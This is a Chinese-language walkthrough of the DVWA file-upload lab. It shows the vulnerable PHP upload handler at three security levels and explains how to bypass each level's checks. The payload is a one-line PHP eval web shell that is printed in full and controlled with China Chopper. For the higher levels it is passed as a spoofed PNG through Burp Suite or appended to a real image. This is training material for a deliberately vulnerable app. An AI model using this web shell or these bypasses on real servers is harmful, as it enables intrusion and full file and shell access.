Low
- 源代码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //设置上传目录
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); //上传目录加上‘uploaded’表单参数所提交的文件名
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { //移动上传的文件到目标路径
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
可以看出,Low级别代码对上传文件几乎没有任何处理,可上传任意格式、大小文件,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应的提示信息。
漏洞利用
上传一句话木马文件,连接的密码为123
上传成功,并返回了对应的路径
将蓝色部分的去掉,换上返回上传的地址
在中国菜刀右键——添加——输入shell地址:http://127.0.0.1/DVWA-master/hackable/uploads/1.php
可以下载、修改服务器的所有文件
还可以打开终端
Medium
- 源代码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
可以看到,Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)
我们通过burpsuite抓包并修改文件类型。
将上面一句话木马重命名为test.png
上传test.png抓包
修改完成之后店址Forward, Forward是发送这个包
上传成功!
再用中国菜刀连接,跟low的一样,这里就不再重复
High
- 源代码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
代码分析:
增加了strrpos()函数和getimagesize()函数,从源码中发现对文件上传的格式做了更加严格的限制,要求上传文件名形式必须是”.jpg”、”.jpeg” 、”*.png”其中之一,而且限制了上传文件的文件头必须为图像类型。
strrpos() 函数:查找字符串在另一字符串中最后一次出现的位置。在这里是从文件名中找到含"."的字符
getimagesize()函数:用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。
我们需要进行操作,将一句话木马文件与图片合并成一个图片类型的文件,具体如下:
先把图片文件改后缀名整成txt类型
打开这个txt文件,在最后加入一句话木马(<?php @eval($_POST['123']); ?> )
再改回jpg类型文件
上传,成功,连接菜刀